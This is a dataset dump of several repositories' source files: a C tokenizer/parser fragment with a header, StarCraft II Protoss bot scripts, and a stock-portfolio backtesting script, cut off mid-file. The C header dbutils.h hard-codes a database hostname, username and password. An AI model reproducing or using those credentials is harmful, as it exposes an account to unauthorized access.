0;\n\t\n\t\n\t/* looks for the (* syntax, and then tries to find the return type */\n\tfor(i = pos - 1; i >= 0; i--)\n\t{\n\t\tif(returnValid == 1)\n\t\t{\n\t\t\tbreak;\n\t\t}\t\n\n\t\t/* this finds the (* syntax that is needed (inserted by migrateFunctions) */\n\t\tif(strcmp(tokens->contents[i], \"(*\") == 0)\n\t\t{\n\t\t\tint j;\n\n\t\t\tprevSyntax = 1;\n\n\t\t\t/* loop backwards from the (* syntax to get the return type. */\n\t\t\tfor(j = i - 1; j >= 0; j--)\n\t\t\t{\n\t\t\t\tif(isValidType(tokens->contents[j]) || isValidName(tokens->contents[j]))\n\t\t\t\t{\n\t\t\t\t\treturnValid = 1;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\t/* ignore spaces and asterisks */\n\t\t\t\telse if(!isspace(((char*)tokens->contents[j])[0]) && strcmp(tokens->contents[j], \"*\") != 0)\n\t\t\t\t{\n\t\t\t\t\treturn 0;\n\t\t\t\t}\n\n\t\t\t}\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\t/* if the current token is valid */\n\tif(isValidName(tokens->contents[pos]))\n\t{\n\t\tnameValid = 1;\n\t}\n\telse\n\t{\n\t\treturn 0;\n\t}\n\n\t/* checks for the following syntax */\n\tfor(i = pos + 1; i < tokens->length; i++)\n\t{\n\t\tif(postSyntax == 1)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tif(strcmp(tokens->contents[i], \")\") == 0)\n\t\t{\n\t\t\tint j;\n\t\t\tpostSyntax = 1;\n\n\t\t\t/* loop after the closing brace that surrounds the function pointer name */\n\t\t\tfor(j = i + 1; j < tokens->length; j++)\n\t\t\t{\n\t\t\t\t/* this would represent the opening brace after the function pointer name */\n\t\t\t\tif(strcmp(tokens->contents[j], \"(\") == 0)\n\t\t\t\t{\n\t\t\t\t\thasBrackets = 1;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\telse if(!isspace(((char*) tokens->contents[j])[0]))\n\t\t\t\t{\n\t\t\t\t\treturn 0;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\t/* returning 1 only if all the conditions are true */\n\treturn returnValid && prevSyntax && nameValid && postSyntax && hasBrackets;\n}\n\nint beginsFunction(Vector* tokens, int pos)\n{\n\tint i;\n\n\tint typeValid;\n\tint nameValid;\n\tint parnValid;\n\tint index;\n\n\ttypeValid = 0;\n\tnameValid = 0;\n\tparnValid = 0;\n\ti = 0;\n\n\tindex = 0;\n\n\tif(isValidType(tokens->contents[pos]) == 1)\n\t{\n\t\tindex = pos + 1;\n\t\ttypeValid = 1;\n\t}\n\telse if(isValidType(tokens->contents[pos]) == 2)\n\t{\n\t\tfor(i = pos + 1; i < tokens->length; i++)\n\t\t{\n\t\t\tif(isValidName(tokens->contents[i]))\n\t\t\t{\n\t\t\t\tindex = i + 1;\n\t\t\t\ttypeValid = 1;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t\t{\n\t\t\t\treturn 0;\n\t\t\t}\n\t\t}\n\t}\n\telse if(isValidType(tokens->contents[pos]) == 3)\n\t{\n\t\t/* check for a valid class name */\n\t\tfor(i = pos + 1; i < tokens->length; i++)\n\t\t{\n\t\t\tif(isValidName(tokens->contents[i]))\n\t\t\t{\n\t\t\t\tindex = i + 1;\n\t\t\t\ttypeValid = 1;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t\t{\n\t\t\t\treturn 0;\n\t\t\t}\n\n\t\t}\n\t}\n\n\tfor(i = index; i < tokens->length; i++)\n\t{\n\t\t/* this would be the name of the function itself. */\n\t\tif(isValidName(tokens->contents[i]))\n\t\t{\n\t\t\tnameValid = 1;\n\t\t\tindex = i + 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(strstr(\"*****\", tokens->contents[i]) != NULL)\n\t\t{\n\t\t\tint j;\n\t\t\tfor(j = i + 1; j < tokens->length; j++)\n\t\t\t{\n\t\t\t\t/* if we found a pointer (up to five levels), we need to find the name */\n\t\t\t\tif(isValidName(tokens->contents[j]))\n\t\t\t\t{\n\t\t\t\t\tnameValid = 1;\n\t\t\t\t\tindex = j + 1;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\telse if(!isspace(((char*)tokens->contents[j])[0]))\n\t\t\t\t{\n\t\t\t\t\treturn 0;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\t/* search for the open parenthesis */\n\tfor(i = index; i < tokens->length; i ++)\n\t{\n\t\tif(strcmp(tokens->contents[i], \"(\") == 0)\n\t\t{\n\t\t\tparnValid = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\treturn nameValid && typeValid && parnValid;\n}\n\nint isVariable(Vector* tokens, int pos)\n{\n\tint i;\n\n\tint typePresent;\n\tint nameValid;\n\tint suffixValid;\n\n\ttypePresent = 0;\n\tnameValid = 0;\n\tsuffixValid = 0;\n\n\n\tif(tokens == NULL)\n\t{\n\t\treturn -1;\n\t}\n\telse if(pos >= tokens->length || pos < 0)\n\t{\n\t\treturn -1;\n\t}\n\n\t/* loop backwards until we find a variable type */\n\tfor(i = pos - 1; i >= 0; i--)\n\t{\n\t\tif(isValidType(tokens->contents[i]) || isValidName(tokens->contents[i]) )\n\t\t{\n\t\t\ttypePresent = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(strcmp(\",\", tokens->contents[i]) == 0)\n\t\t{\n\t\t\tcontinue;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]) && strcmp(tokens->contents[i], \"*\") != 0)\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\tif(isValidName(tokens->contents[pos]))\n\t{\n\t\tnameValid = 1;\n\t}\n\n\tfor(i = pos + 1; i < tokens->length; i++)\n\t{\n\t\tif(strstr(\",;=[\", tokens->contents[i]) != NULL)\n\t\t{\n\t\t\tsuffixValid = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]))\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\tif(typePresent && nameValid && suffixValid)\n\t{\n\t\treturn 1;\n\t}\n\n\treturn 0;\n}\n\n/*\nint isVariableDeclaration(Vector* tokens, int pos)\n{\n\tint i;\n\n\tint typePreceeds;\n\tint nameValid;\n\tint semicolonFollows;\n\n\ttypePreceeds = 0;\n\tsemicolonFollows = 0;\n\n\tif(!isValidName(tokens->contents[pos]))\n\t{\n\t\treturn 0;\n\t}\n\n\tfor(i = pos - 1; i >= 0; i++)\n\t{\n\t\tif(isValidType(tokens->contents[i]))\n\t\t{\n\t\t\ttypePreceeds = 1;\n\t\t}\n\t\telse if(strstr(\"{;}=\", tokens->contents[i]) != NULL)\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\tif(isValidName(nameValid))\n\t{\n\t\tnameValid = 1;\n\t}\n\telse\n\t{\n\t\treturn 0;\n\t}\n\n\tfor(i = pos + 1; i < tokens->pos; i++)\n\t{\n\t\tif(strcmp(tokens->contents[i]) == 0)\n\t\t{\n\n\t\t}\n\t\telse if()\n\t\t{\n\n\t\t}\n\t}\n\n\treturn typePreceeds && nameValid && semicolonFollows;\n}\n*/\n\nint isClassVariable(Vector* tokens, int pos)\n{\n\tint i;\n\tint classPresent;\n\tint classNamePresent;\n\tint nameValid;\n\tint isDecOrDef;\n\n\tclassPresent = 0;\n\tclassNamePresent = 0;\n\tnameValid = 0;\n\tisDecOrDef = 0;\n\n\t/* find the className. */\n\tfor(i = pos - 1; i >= 0; i--)\n\t{\n\t\tif(classPresent == 1)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\tif(strcmp(tokens->contents[i], \"class\") == 0)\n\t\t{\n\t\t\tint j;\n\n\t\t\tfor(j = i + 1; j < pos; j++)\n\t\t\t{\n\t\t\t\tif(isValidName(tokens->contents[j]))\n\t\t\t\t{\n\t\t\t\t\tclassNamePresent = 1;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\telse if(!isspace(((char*)tokens->contents[j])[0]))\n\t\t\t\t{\n\t\t\t\t\treturn 0;\n\t\t\t\t}\n\t\t\t}\n\t\t\tclassPresent = 1;\n\n\t\t}\n\t\t/* the only other accepted characters are spaces, variable/class names, and commas */\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]) && !isValidName(tokens->contents[i])&& strcmp(tokens->contents[i], \",\") != 0)\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\t}\n\n\tif(isValidName(tokens->contents[pos]))\n\t{\n\t\tnameValid = 1;\n\t}\n\telse\n\t{\n\t\treturn 0;\n\t}\n\n\t/* now we are searching for the semicolon. we will ignore commas and valid names. */\n\tfor(i = pos + 1; i < tokens->length; i++)\n\t{\n\t\t/* checks if tokens->contents[i] is contained within ;= */\n\t\tif(strstr(\";=\",tokens->contents[i]) != NULL)\n\t\t{\n\t\t\tisDecOrDef = 1;\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]) && !isValidName(tokens->contents[i]) && strcmp(tokens->contents[i], \",\") != 0)\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\n\t}\n\n\treturn classPresent && classNamePresent && nameValid && isDecOrDef;\n}\n" }, { "alpha_fraction": 0.6113585829734802, "alphanum_fraction": 0.6146993041038513, "avg_line_length": 10.946666717529297, "blob_id": "7b4c9f774c0bf1a2b7c6a0c0e117714700c2e68a", "content_id": "aac95f557aba14a62048f95a515a47cea85f6b34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 898, "license_type": "no_license", "max_line_length": 75, "num_lines": 75, "path": "/dbutils.h", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "\n\n#ifndef __GSOVERNIGO_DBUTILS_H__\n#define __GSOVERNIGO_DBUTILS_H__\n\n#include <mysql/mysql.h>\n\n#define QUERY_MAX 512\n\n#define HOSTNAME \"dursley.socs.uoguelph.ca\"\n#define USERNAME \"gsoverni\"\n#define PASSWORD \"0948924\"\n#define DATABASE \"gsoverni\"\n\n\n/**\n *\n */\nint mysql_startConnect(MYSQL* sql);\n\n/**\n *\n */\nint mysql_make(MYSQL* sql);\n\n/**\n *\n */\nint mysql_clear(MYSQL* sql);\n\n/**\n *\n */\nint mysql_reset(MYSQL* sql);\n\n/**\n *\n */\nint mysql_posts(MYSQL* sql);\n\n/**\n *\n */\nint mysql_users(MYSQL* sql);\n\n/**\n *\n */\nint mysql_streams(MYSQL* sql);\n\n/**\n *\n */\nint getLastRead(char* username, char* stream, MYSQL* sql);\n\n/**\n *\n */\nint setLastRead(char* username, char* stream, int n, MYSQL* sql);\n\n/**\n *\n */\nint numposts(char* stream, MYSQL* sql);\n\n/**\n *\n */\nint getPostN(char* username, char* stream, char* order, int n, MYSQL* sql);\n\n/**\n *\n */\nint getStreams(char* username, MYSQL* sql);\n\n\n#endif\n" } ]
30
arjunsv/sc2-deepmind-ai
https://github.com/arjunsv/sc2-deepmind-ai
44f0cccc889c4be32287e80dc4c6d21677a9a59e
2baa1ed62182b9e79e7927d28a03ee91c5507be3
c497ee17c6dff1c452bb7a99b6e7d92b65d689fc
refs/heads/master
2020-03-21T08:07:09.272791
2018-07-16T00:32:19
2018-07-16T00:32:19
138,321,659
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6350559592247009, "alphanum_fraction": 0.6409163475036621, "avg_line_length": 37.32653045654297, "blob_id": "e5cb9b9b31e54fb9fe4c996e0f5a05c470f5a379", "content_id": "8a159839f2ce7bdba4ad47acb97f8ed45ba71a1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1877, "license_type": "no_license", "max_line_length": 97, "num_lines": 49, "path": "/Proxy2Gate.py", "repo_name": "arjunsv/sc2-deepmind-ai", "src_encoding": "UTF-8", "text": "import sc2\nimport random\nfrom sc2 import run_game, maps, Race, Difficulty\nfrom sc2.player import Bot, Computer\nfrom sc2.constants import NEXUS, PROBE, PYLON, GATEWAY\n\nclass Proxy2GateBot(sc2.BotAI):\n def __init__(self):\n self.proxy_location_reached = False\n self.proxy_pylon_built = False\n self.proxy_gateways_built = False\n \n\n async def on_step(self, iteration):\n if not self.proxy_pylon_built:\n await self.distribute_workers()\n\n self.proxy_location = self.game_info.map_center.towards(self.enemy_start_locations[0], 5)\n\n if not self.proxy_location_reached:\n worker = self.select_build_worker(self.proxy_location)\n await self.do(worker.move(self.proxy_location))\n self.proxy_location_reached = True\n\n if self.proxy_location_reached and self.can_afford(PYLON) and not self.proxy_pylon_built:\n await self.build(PYLON, near=self.proxy_location)\n self.proxy_pylon_built = True\n\n if self.units(PYLON).ready.amount >= 1 and not self.proxy_gateways_built:\n await self.build(GATEWAY, near=self.proxy_location)\n await self.build(GATEWAY, near=self.proxy_location)\n self.proxy_gateways_built = True\n\n async def build_workers(self):\n for nexus in self.units(NEXUS).ready.noqueue:\n if self.can_afford(PROBE):\n await self.do(nexus.train(PROBE))\n\n async def build_pylon(self):\n if self.supply_left < 5 and not self.already_pending(PYLON):\n nexuses = self.units(NEXUS).ready\n if nexuses.exists:\n if self.can_afford(PYLON):\n await self.build(PYLON, near=nexuses.first)\n\nrun_game(maps.get(\"AbyssalReefLE\"), [\n Bot(Race.Protoss, Proxy2GateBot()),\n Computer(Race.Zerg, Difficulty.Easy)\n ], realtime=True)" }, { "alpha_fraction": 0.5651703476905823, "alphanum_fraction": 0.5839192271232605, "avg_line_length": 38.34751892089844, "blob_id": "2e2b74763f35ae97ce01c667ad1962718b10a186", "content_id": "4a2b54e6f5e0498e28e08bb6343ddf1f4048271b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5547, "license_type": "no_license", "max_line_length": 119, "num_lines": 141, "path": "/ArjBot.py", "repo_name": "arjunsv/sc2-deepmind-ai", "src_encoding": "UTF-8", "text": "import sc2\nimport random\nimport cv2\nimport numpy as np\nfrom sc2 import run_game, maps, Race, Difficulty\nfrom sc2.player import Bot, Computer\nfrom sc2.constants import NEXUS, PROBE, PYLON, ASSIMILATOR, GATEWAY, \\\n CYBERNETICSCORE, STALKER, STARGATE, VOIDRAY\n\nclass ArjBot(sc2.BotAI):\n def __init__(self):\n self.ITERATIONS_PER_MINUTE = 165\n self.MAX_WORKERS = 50\n\n async def on_step(self, iteration):\n self.iteration = iteration\n\n await self.render_visualization()\n await self.scout()\n await self.distribute_workers()\n await self.build_workers()\n await self.build_pylons()\n await self.build_assimilators()\n await self.expand()\n await self.build_tech()\n await self.build_army()\n await self.attack()\n\n async def render_visualization(self):\n game_data = np.zeros((self.game_info.map_size[1], self.game_info.map_size[0], 3), np.uint8)\n\n # UNIT: [SIZE, (BGR COLOR)]\n unit_dims = {\n NEXUS: [15, (0, 255, 0)],\n PYLON: [3, (20, 235, 0)],\n PROBE: [1, (55, 200, 0)],\n\n ASSIMILATOR: [2, (55, 200, 0)], \n GATEWAY: [3, (200, 100, 0)],\n CYBERNETICSCORE: [3, (150, 150, 0)],\n STARGATE: [5, (255, 0, 0)],\n VOIDRAY: [3, (255, 100, 0)],\n }\n \n for unit_type in unit_dims:\n for unit in self.units(unit_type).ready:\n pos = unit.position\n cv2.circle(game_data, (int(pos[0]), int(pos[1])), unit_dims[unit_type][0], unit_dims[unit_type][1], -1)\n\n\n flipped = cv2.flip(game_data, 0)\n resized = cv2.resize(flipped, dsize=None, fx=2, fy=2)\n\n cv2.imshow('Visualization', resized)\n cv2.waitKey(1)\n\n async def build_workers(self):\n if (len(self.units(NEXUS)) * 16) > len(self.units(PROBE)) and len(self.units(PROBE)) < self.MAX_WORKERS:\n for nexus in self.units(NEXUS).ready.noqueue:\n if self.can_afford(PROBE):\n await self.do(nexus.train(PROBE))\n\n\n async def build_pylons(self):\n if self.supply_left < 5 and not self.already_pending(PYLON):\n nexuses = self.units(NEXUS).ready\n if nexuses.exists:\n if self.can_afford(PYLON):\n await self.build(PYLON, near=nexuses.first)\n\n async def build_assimilators(self):\n for nexus in self.units(NEXUS).ready:\n vaspenes = self.state.vespene_geyser.closer_than(15.0, nexus)\n for vaspene in vaspenes:\n if not self.can_afford(ASSIMILATOR):\n break\n worker = self.select_build_worker(vaspene.position)\n if worker is None:\n break\n if not self.units(ASSIMILATOR).closer_than(1.0, vaspene).exists:\n await self.do(worker.build(ASSIMILATOR, vaspene))\n\n async def expand(self):\n if self.units(NEXUS).amount < (self.iteration / self.ITERATIONS_PER_MINUTE) and self.can_afford(NEXUS):\n await self.expand_now()\n\n async def build_tech(self):\n #print(self.iteration / self.ITERATIONS_PER_MINUTE)\n if self.units(PYLON).ready.exists:\n pylon = self.units(PYLON).ready.random\n\n if self.units(GATEWAY).ready.exists and not self.units(CYBERNETICSCORE):\n if self.can_afford(CYBERNETICSCORE) and not self.already_pending(CYBERNETICSCORE):\n await self.build(CYBERNETICSCORE, near=pylon)\n\n elif len(self.units(GATEWAY)) < 1:\n if self.can_afford(GATEWAY) and not self.already_pending(GATEWAY):\n await self.build(GATEWAY, near=pylon)\n\n if self.units(CYBERNETICSCORE).ready.exists:\n if len(self.units(STARGATE)) < ((self.iteration / self.ITERATIONS_PER_MINUTE)):\n if self.can_afford(STARGATE) and not self.already_pending(STARGATE):\n await self.build(STARGATE, near=pylon)\n\n async def build_army(self):\n for gw in self.units(GATEWAY).ready.noqueue:\n if not self.units(STALKER).amount > self.units(VOIDRAY).amount:\n if self.can_afford(STALKER) and self.supply_left > 0:\n await self.do(gw.train(STALKER))\n\n for sg in self.units(STARGATE).ready.noqueue:\n if self.can_afford(VOIDRAY) and self.supply_left > 0:\n await self.do(sg.train(VOIDRAY))\n\n def find_target(self, state):\n if self.known_enemy_units:\n return random.choice(self.known_enemy_units)\n elif self.known_enemy_structures:\n return random.choice(self.known_enemy_structures)\n else:\n return self.enemy_start_locations[0]\n\n async def attack(self):\n # {UNIT: [n to fight, n to defend]}\n attack_units = {VOIDRAY: [8, 3]}\n\n for UNIT in attack_units:\n if self.units(UNIT).amount > attack_units[UNIT][0] and self.units(UNIT).amount > attack_units[UNIT][1]:\n for s in self.units(UNIT).idle:\n await self.do(s.attack(self.find_target(self.state)))\n\n elif self.units(UNIT).amount > attack_units[UNIT][1]:\n if self.known_enemy_units:\n for s in self.units(UNIT).idle:\n await self.do(s.attack(random.choice(self.known_enemy_units)))\n\n\nrun_game(maps.get(\"AbyssalReefLE\"), [\n Bot(Race.Protoss, ArjBot()),\n Computer(Race.Terran, Difficulty.Hard)\n ], realtime=False)" }, { "alpha_fraction": 0.7058823704719543, "alphanum_fraction": 0.7647058963775635, "avg_line_length": 17, "blob_id": "292812abbe00a3c14fc15d487c7ef7daf2e3c071", "content_id": "3a1fab56d654c15b82dbbb4316ad487c336289e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 17, "license_type": "no_license", "max_line_length": 17, "num_lines": 1, "path": "/README.md", "repo_name": "arjunsv/sc2-deepmind-ai", "src_encoding": "UTF-8", "text": "# sc2-deepmind-ai" } ]
3
Larisa1992/HW-D6-Library
https://github.com/Larisa1992/HW-D6-Library
28983cf77306a2151d7ceafad98cdbb964783985
5458b35a32a3977ae306775858f003b3ede516b8
3778b8991bbb8cf0e0a445f304ae6f0cd32fa647
refs/heads/master
2022-12-08T13:02:13.016623
2020-09-03T21:02:17
2020-09-03T21:02:17
292,100,144
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7226013541221619, "alphanum_fraction": 0.7258129119873047, "avg_line_length": 58.30952453613281, "blob_id": "c5a3587cea2d27136afd479acc6686be891ae063", "content_id": "fb7425b8784a7ca4bb8258cda96039ed2bc5fd7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2801, "license_type": "no_license", "max_line_length": 220, "num_lines": 42, "path": "/my_site/urls.py", "repo_name": "Larisa1992/HW-D6-Library", "src_encoding": "UTF-8", "text": "\"\"\"my_site URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom p_library.views import AuthorEdit, AuthorList, author_create_many, books_authors_create_many, FriendList, FriendEdit, friends_books, BookList, book_edit, books_list, index, book_increment, book_decrement, publishing\n\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', books_list), # books_list - метод, который будет исполнятся при запросе URL в первом аргументе\n path('index/', index, name='all_book'),\n path('index/book_increment/', book_increment),\n path('index/book_decrement/', book_decrement),\n path('index/publishing/', publishing),\n path('author/create', AuthorEdit.as_view(), name='author_create'),\n path('authors', AuthorList.as_view(), name='author_list'),\n path('author/create_many', author_create_many, name='author_create_many'),\n path('author_book/create_many', books_authors_create_many, name='author_book_create_many'), #books_authors_create_many вызываем метод из файла view.py\n path('friends/', FriendList.as_view(), name='friend_list'), # выводим список друзей и переходим в форму создания друга и форму выдачи книг друзьям\n path('friend/create', FriendEdit.as_view(), name='friend_create'), # формма создания друга\n path('friends/books', friends_books, name='friends_books'), # формма создания друга\n path('books', BookList.as_view(), name='books_list'), # форма просмотра всех книг с уточнением, у кого книга. \n path('book/edit/<int:book_id>/', book_edit, name='book_edit'), # форма редактирования книги, можно отдать книгу другу\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) # для статических медиа файлов\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) # для файлов стилей\n" }, { "alpha_fraction": 0.7904683351516724, "alphanum_fraction": 0.8069022297859192, "avg_line_length": 38.25806427001953, "blob_id": "6d3aab2ad5be0dece1f6b6ea0915bba05c2bffd3", "content_id": "14570e5cca4f0e24ddc9acdcdf8167ab0b722536", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2013, "license_type": "no_license", "max_line_length": 188, "num_lines": 31, "path": "/README.md", "repo_name": "Larisa1992/HW-D6-Library", "src_encoding": "UTF-8", "text": "# HW-D6-Library\nHome Work for module d6 (static and base.html)\n\nРазворачиваем проект:\n1) скачайте репозиторий в вирутальное окружение\n\n2) установите пакеты, используемые в проекте командой\npip install -r requirements.txt\n\n3) запустите проект командой\npython manage.py runserver\n\nОписание функционала\n1) для входа под администратором используйте данные\nЛогин: admin\nПароль: django\n(если будут ошибки, попробуйте создать своего суперпользователя - как это сделать, описано в курсе)\n\nВойдя под администратором, можно создавать все объекты проекта - авторов, книги, издательства и друзей\n\n2) Главная страница проекта расположена по пути \"index/\" (http://127.0.0.1:8000/index/)\n\nВ базовом шаблоне задана шапка сайтас тремя ссылками:\nMy personal library\nMy friends\nMy books\n\n3) для проверки пункта 3 домашнего задания (\"Добавьте в модель книги возможность загружать картинки к книгам (в этом задании допускается сделать это через панель администратора)\")\nперейдите по ссылке \"My books\" в шапке проекта с любой страницы и нажмите \"Редактировать\" для любой книги. Перед кнопкой \"Сохранить\" есть действие \"Выберите файл\" для загрузки изображения.\n\n4) После сохранения книги выполняется переадресация на список книг (My books)\n" } ]
2
wayRaimy/Backtesting-of-MVO-portfolio
https://github.com/wayRaimy/Backtesting-of-MVO-portfolio
a516f006f3b982b38c75db637562f144d03eb892
6e86f679f34c21d08b1b0f0d1521918fdcdc3802
1e6f760db2beec395990416eda88ddb166b583f0
refs/heads/master
2023-04-19T01:14:00.765004
2019-12-22T16:02:31
2019-12-22T16:02:31
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5296229720115662, "alphanum_fraction": 0.5423898100852966, "avg_line_length": 25.956989288330078, "blob_id": "dfbd14929ce85cef4fc41ee16c11a00ce627e04a", "content_id": "43a7c87d0476ef0af9bfec63af65dfe8c12c8192", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5013, "license_type": "permissive", "max_line_length": 82, "num_lines": 186, "path": "/backtesting.py", "repo_name": "wayRaimy/Backtesting-of-MVO-portfolio", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport optimizer as opt\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\n\n\nstocks = ['PTT', 'CPALL', 'SCC', 'BDMS', 'AOT']\nMONEY = 1000000\nFEE = 0.0015\n\n# import and clean data\ndf = opt.getStockDataFrame(stocks)\ndf.at[datetime.strptime('1/2/2009', '%m/%d/%Y'), 'PTT'] = 17.5\ndf.at[datetime.strptime('7/6/2009', '%m/%d/%Y'), 'PTT'] = 22.7\n\n\ndef plot_monthly_with_fee():\n volume = {name: 0 for name in stocks}\n weight = {name: 0 for name in stocks}\n\n money = MONEY\n tem = 0\n\n plt_day = []\n plt_val = []\n\n for index, row in enumerate(df.iterrows()):\n date = row[0]\n price = row[1]\n\n # calculate every month or every year\n routine = date.day\n if routine < tem:\n\n # calculate total money by selling all\n for stock in stocks:\n money += volume[stock] * price[stock]\n\n weight = opt.allocate(df.iloc[:index])\n \n # calculate new volume\n for stock in stocks:\n available = weight[stock] * money\n volume[stock] = (available * (1 - FEE)) / price[stock]\n money -= available\n \n plt_day += [date]\n plt_val += [money + sum(volume[stock] * price[stock] for stock in stocks)]\n tem = routine\n plt.plot(plt_day, plt_val, label='monthly with fee')\n\n\ndef plot_monthly_without_fee():\n volume = {name: 0 for name in stocks}\n weight = {name: 0 for name in stocks}\n\n money = MONEY\n tem = 0\n\n plt_day = []\n plt_val = []\n\n for index, row in enumerate(df.iterrows()):\n date = row[0]\n price = row[1]\n\n # calculate every month or every year\n routine = date.day\n if routine < tem:\n\n # calculate total money by selling all\n for stock in stocks:\n money += volume[stock] * price[stock]\n\n weight = opt.allocate(df.iloc[:index])\n \n # calculate new volume\n for stock in stocks:\n available = weight[stock] * money\n volume[stock] = available / price[stock]\n money -= available\n \n plt_day += [date]\n plt_val += [money + sum(volume[stock] * price[stock] for stock in stocks)]\n tem = routine\n plt.plot(plt_day, plt_val, label='monthly without fee')\n\n\ndef plot_annually_with_fee():\n volume = {name: 0 for name in stocks}\n weight = {name: 0 for name in stocks}\n\n money = MONEY\n tem = 0\n\n plt_day = []\n plt_val = []\n\n for index, row in enumerate(df.iterrows()):\n date = row[0]\n price = row[1]\n\n # calculate every month or every year\n routine = date.month\n if routine < tem:\n\n # calculate total money by selling all\n for stock in stocks:\n money += volume[stock] * price[stock]\n\n weight = opt.allocate(df.iloc[:index])\n \n # calculate new volume\n for stock in stocks:\n available = weight[stock] * money\n volume[stock] = (available * (1 - FEE)) / price[stock]\n money -= available\n \n plt_day += [date]\n plt_val += [money + sum(volume[stock] * price[stock] for stock in stocks)]\n tem = routine\n plt.plot(plt_day, plt_val, label='yearly with fee')\n\n\ndef plot_annually_without_fee():\n volume = {name: 0 for name in stocks}\n weight = {name: 0 for name in stocks}\n\n money = MONEY\n tem = 0\n\n plt_day = []\n plt_val = []\n\n for index, row in enumerate(df.iterrows()):\n date = row[0]\n price = row[1]\n\n # calculate every month or every year\n routine = date.month\n if routine < tem:\n\n # calculate total money by selling all\n for stock in stocks:\n money += volume[stock] * price[stock]\n\n weight = opt.allocate(df.iloc[:index])\n \n # calculate new volume\n for stock in stocks:\n available = weight[stock] * money\n volume[stock] = available / price[stock]\n money -= available\n \n plt_day += [date]\n plt_val += [money + sum(volume[stock] * price[stock] for stock in stocks)]\n tem = routine\n plt.plot(plt_day, plt_val, label='yearly without fee')\n\n\ndef plot_set_index():\n money = MONEY\n volume = 0\n plt_day = []\n plt_val = []\n data = pd.read_csv(\"SET50.csv\", index_col=0)\n for date, price in data.iterrows():\n plt_day += [datetime.strptime(date, '%Y-%m-%dT%H:%M:%S')]\n\n if money >= price['Close']:\n volume = money / price['Close']\n money = 0\n\n plt_val += [volume * price['Close']]\n\n plt.plot(plt_day, plt_val, label='SET50')\n \n\nplot_monthly_with_fee()\nplot_monthly_without_fee()\nplot_annually_with_fee()\nplot_annually_without_fee()\nplot_set_index()\n\nplt.legend(bbox_to_anchor=(0.7, 0.3), loc='upper left', borderaxespad=0.)\nplt.show()" }, { "alpha_fraction": 0.7161290049552917, "alphanum_fraction": 0.7419354915618896, "avg_line_length": 43.28571319580078, "blob_id": "f3ab80fcae1cd11ce26e3312fe9a6fcd0d6f06bd", "content_id": "a9e5971f553fa0cfaeeb8572e1443522b0feb113", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 310, "license_type": "permissive", "max_line_length": 87, "num_lines": 7, "path": "/README.md", "repo_name": "wayRaimy/Backtesting-of-MVO-portfolio", "src_encoding": "UTF-8", "text": "# Backtesting-of-MVO-portfolio\n\nThis backtesting used `stocks = ['PTT', 'CPALL', 'SCC', 'BDMS', 'AOT']` as samples\nand visualized the profit/loss of the MVO portfolio in the period between 2009 and 2019\n\n### Rebalance 